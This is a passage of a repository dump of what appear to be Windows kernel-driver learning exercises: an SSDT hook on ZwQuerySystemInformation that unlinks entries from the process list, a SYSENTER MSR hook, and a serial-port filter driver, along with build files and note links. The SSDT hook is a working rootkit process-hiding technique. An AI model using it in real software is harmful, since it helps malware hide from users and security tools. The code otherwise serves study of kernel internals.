KernelTime.QuadPart += now->KernelTime.QuadPart; 118 | if (prev) 119 | { 120 | if (now->NextEntryDelta) 121 | prev->NextEntryDelta += now->NextEntryDelta; 122 | else 123 | prev->NextEntryDelta = 0; 124 | } 125 | else 126 | { 127 | if (now->NextEntryDelta) 128 | (char*)SystemInformation += now->NextEntryDelta; 129 | else 130 | SystemInformation = NULL; 131 | } 132 | } 133 | else if (now->ProcessName.Buffer == NULL) 134 | { 135 | now->UserTime.QuadPart += UserTime.QuadPart; 136 | now->KernelTime.QuadPart += KernelTime.QuadPart; 137 | } 138 | prev = now; 139 | if (now->NextEntryDelta) (char*)now += now->NextEntryDelta; 140 | else now = NULL; 141 | } 142 | } 143 | else if (SystemInformationClass == 8) 144 | { 145 | PSYSTEM_PROCESSOR_TIMES times = (PSYSTEM_PROCESSOR_TIMES)SystemInformation; 146 | times->IdleTime.QuadPart += UserTime.QuadPart + KernelTime.QuadPart; 147 | } 148 | } 149 | return status; 150 | } 151 | 152 | NTSTATUS MAKEMyMDL() 153 | { 154 | MyMDL = MmCreateMdl( 155 | NULL, 156 | KeServiceDescriptorTable.ServiceTableBase, 157 | KeServiceDescriptorTable.NumberOfServices*4); 158 | if (!MyMDL) return STATUS_UNSUCCESSFUL; 159 | 160 | MmBuildMdlForNonPagedPool(MyMDL); 161 | MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA; 162 | NewServiceDescriptorTable = MmMapLockedPages(MyMDL, KernelMode); 163 | return STATUS_SUCCESS; 164 | } 165 | 166 | VOID HookFunc() 167 | { 168 | HOOKFUNC(ZwQuerySystemInformation, NewFunc, OldFunc); 169 | } 170 | 171 | VOID Unload(PDRIVER_OBJECT driver) 172 | { 173 | UNHOOKFUNC(ZwQuerySystemInformation, OldFunc); 174 | if (NewServiceDescriptorTable) 175 | { 176 | MmUnmapLockedPages(NewServiceDescriptorTable, MyMDL); 177 | IoFreeMdl(MyMDL); 178 | } 179 | DbgPrint("In Unload"); 180 | } 181 | 182 | NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 183 | { 184 | DbgPrint("In DriverEntry"); 185 | if (MAKEMyMDL()!=STATUS_SUCCESS) return STATUS_UNSUCCESSFUL; 186 | HookFunc(); 187 | driver->DriverUnload = Unload; 188 | return STATUS_SUCCESS; 189 | } 190 | -------------------------------------------------------------------------------- /SSDTHook/SSDTHook.h: -------------------------------------------------------------------------------- 1 | #ifndef SSDTHOOK_H 2 | #define SSDTHOOK_H 3 | 4 | 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /SSDTHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /SSDTHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=SSDTHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=SSDTHook.c 14 | -------------------------------------------------------------------------------- /SYSENTERHook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | ULONG OldFunc; 4 | 5 | VOID Unload(PDRIVER_OBJECT driver ) 6 | { 7 | _asm 8 | { 9 | mov ecx, 0x176 10 | xor edx,edx 11 | mov eax, OldFunc 12 | wrmsr 13 | } 14 | } 15 | 16 | 17 | __declspec(naked) MyKiFastCallEntry() 18 | { 19 | _asm jmp [OldFunc] 20 | } 21 | 22 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg ) 23 | { 24 | driver->DriverUnload = Unload; 25 | 26 | _asm { 27 | mov ecx, 0x176 28 | rdmsr 29 | mov OldFunc, eax 30 | mov eax, MyKiFastCallEntry 31 | wrmsr 32 | } 33 | 34 | return STATUS_SUCCESS; 35 | } -------------------------------------------------------------------------------- /SYSENTERHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /SYSENTERHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=SYSENTERHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /comfilter/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define NTSTRSAFE_LIB 4 | #include "ntstrsafe.h" 5 | 6 | #define MAX_COMS 32 7 | #define NAME_LENGTH 30 8 | #define STOPTIME -5000 9 | 10 | PDEVICE_OBJECT realCom[MAX_COMS] = { NULL }; 11 | PDEVICE_OBJECT nextCom[MAX_COMS] = { NULL }; 12 | 13 | void Unload(PDRIVER_OBJECT driver) 14 | { 15 | ULONG i; 16 | LARGE_INTEGER internel; 17 | for (i=0; iType,0,FALSE, &realCom[i]); 43 | if (status != STATUS_SUCCESS) continue; 44 | realCom[i]->Flags = devObj->Flags | DO_DEVICE_INITIALIZING; 45 | nextCom[i] = IoAttachDeviceToDeviceStack( realCom[i], devObj); 46 | if (nextCom[i] == NULL) 47 | { 48 | IoDeleteDevice(realCom[i]); 49 | realCom[i] = NULL; 50 | continue; 51 | } 52 | realCom[i]->Type &= ~DO_DEVICE_INITIALIZING; 53 | } 54 | } 55 | 56 | NTSTATUS dispatch(PDEVICE_OBJECT device, PIRP irp) 57 | { 58 | NTSTATUS status; 59 | PIO_STACK_LOCATION irpsp = IoGetCurrentIrpStackLocation(irp); 60 | ULONG i, j; 61 | for (i=0; iMajorFunction == IRP_MJ_PNP_POWER) 66 | { 67 | PoStartNextPowerIrp(irp); 68 | IoSkipCurrentIrpStackLocation(irp); 69 | return PoCallDriver(nextCom[i], irp); 70 | } 71 | if (irpsp->MajorFunction == IRP_MJ_WRITE) 72 | { 73 | ULONG len = irpsp->Parameters.Write.Length; 74 | PUCHAR buffer = NULL; 75 | if (irp->MdlAddress != NULL) 76 | buffer = (PUCHAR)MmGetSystemAddressForMdlSafe( 77 | irp->MdlAddress, 78 | NormalPagePriority); 79 | else 80 | buffer = (PUCHAR)irp->UserBuffer; 81 | if (buffer == NULL) 82 | buffer = (PUCHAR)irp->AssociatedIrp.SystemBuffer; 83 | for (j = 0; jIoStatus.Information = 0; 93 | irp->IoStatus.Status = STATUS_INVALID_PARAMETER; 94 | IoCompleteRequest(irp, IO_NO_INCREMENT); 95 | 96 | return STATUS_SUCCESS; 97 | } 98 | 99 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 100 | { 101 | ULONG i; 102 | for (i=0; iMajorFunction[i] = dispatch; 105 | } 106 | driver->DriverUnload = Unload; 107 | AttachAll(driver); 108 | return STATUS_SUCCESS; 109 | } -------------------------------------------------------------------------------- /comfilter/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /comfilter/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=comfilter 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | TARGETLIBS= $(DDK_LIB_PATH)\ntstrsafe.lib 7 | 8 | # Create browse info 9 | #BROWSER_INFO=1 10 | #BROWSERFILE= 11 | 12 | # Additional defines for the C/C++ preprocessor 13 | C_DEFINES=$(C_DEFINES) 14 | 15 | SOURCES=main.c 16 | -------------------------------------------------------------------------------- /内核函数.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/内核函数.txt -------------------------------------------------------------------------------- /分段机制.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/分段机制.txt -------------------------------------------------------------------------------- /分页管理.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/分页管理.txt -------------------------------------------------------------------------------- /天书夜读.txt: -------------------------------------------------------------------------------- 1 | IoCallDriver 2 | PsSetCreateProcessNotifyRoutine 3 | PsSetLoadImageNotifyRoutine 4 | KiThreadStartup 5 | -------------------------------------------------------------------------------- /数据库专业课.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/数据库专业课.txt --------------------------------------------------------------------------------